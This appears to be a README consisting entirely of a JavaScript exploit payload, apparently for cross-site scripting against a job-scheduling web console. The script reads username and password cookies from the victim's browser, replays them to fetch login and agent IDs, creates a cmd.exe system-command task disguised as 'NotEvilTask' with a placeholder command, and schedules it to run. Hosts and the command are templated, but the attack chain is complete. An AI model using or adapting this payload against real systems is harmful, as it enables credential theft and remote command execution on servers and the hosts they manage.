README.md
Rendering markdown...
console.log('Starting Payload..');
var d = new Date();
userCookie = 'CurUserName';
pwdCookie= 'CurPassword';
var ca = document.cookie.split(';');
function readCookie(name) {
var nameEQ = name + '=';
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}
function makeid(length) {
var result = '';
var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
var charactersLength = characters.length;
for ( var i = 0; i < length; i++ ) {
result += characters.charAt(Math.floor(Math.random() * charactersLength));
}
return result;
}
var delay = ( function() {
var timer = 0;
return function(callback, ms) {
clearTimeout (timer);
timer = setTimeout(callback, ms);
};
})();
username = decodeURIComponent(readCookie(userCookie));
passwd = readCookie(pwdCookie);
console.log(username + '/' + passwd);
// Get OS Login UID
console.log('[+] Grabbing Login IDs');
var req = new XMLHttpRequest();
req.open('<USERS_METHOD>', '<USERS_HOST>', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
req.send();
var responseData = JSON.parse(req.responseText);
var loginName = responseData.items[0].name;
var loginUID = responseData.items[0].uid; // Grab OS Login UID
console.log('[+] OS Login UID Found: ' + loginUID);
// Get Agent UID
console.log('[+] Grabbing Agent IDs');
var req = new XMLHttpRequest();
req.open('<AGENTS_METHOD>', '<AGENTS_HOST>', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
req.send();
var responseData = JSON.parse(req.responseText);
var agentName = responseData.items[0].name;
var agentUID = responseData.items[0].uid; // Grab OS Login UID
console.log('[+] Agent UID and Name Found: ' + loginUID + ' ' + agentName);
// Create Task Definition
console.log('[+] Executing Task Creation');
var response = '';
var cmd = '<COMMAND_PAYLOAD>';
var req = new XMLHttpRequest();
req.open('<CREATE_METHOD>', '<CREATE_HOST>', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
req.send('{"id":0,"name":"NotEvilTask","uid":"' + makeid(12) + '","enabled":true,"description":"","type":"TASK","subType":"TASK_SYSCMD","agent":{"type":"REMOTE","id":1,"name":"' + agentName + '","uid":"' + agentUID + '"},"attributes":{"exitCodes":"0","isCommandScript":false,"command":"cmd.exe","parameters":"' + cmd + '","startDir":"C:/windows/system32","loadProfile":true},"folder":{"id":2,"name":"Definitions"},"simulate":{"simulateTaskRun":false,"duration":0},"login":{"name":"' + loginName + '","uid":"' + loginUID + '","id":12},"output":{"return":false,"interleave":false,"accumulate":false,"readFromFile":false,"filename":"","format":"","amountType":"","amount":0,"xslStyleSheet":"","stdoutToFile":false,"stdoutAppend":false,"stdoutFilename":"","stderrToFile":false,"stderrAppend":false,"stderrFilename":""},"variables":[],"resources":[],"actions":[]}');
console.log('[+] Success');
var responseData = JSON.parse(req.responseText);
console.log('Data: ' + JSON.stringify(responseData,null,2));
var taskID = responseData.definition.id; // Grab gen ID
console.log('[+] Grabbed ID: ' + taskID);
// Execute Task
console.log('[+] Executing Task');
var req = new XMLHttpRequest();
req.open('<EXEC_METHOD>', '<EXEC_HOST>' + '/oc_main/zenaweb/definitions/' + taskID + '/operation?operation=schedule', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
delay(function(){
req.send('{"schedDate":"' + '2022' + '.' + ('0' + (d.getMonth() + 1)).slice(-2) + '.' + ('0' + d.getDate()).slice(-2) + '","schedTime":"' + '01' + '.' + '01' + '.' + '01' + '","startOnHold":false,"perpetual":false,"skipTriggers":null}');
}, 3000 ); // end delay
var responseData = JSON.parse(req.responseText);
console.log('Data: ' + JSON.stringify(responseData,null,2));
console.log('[+] Task Executed Successfully');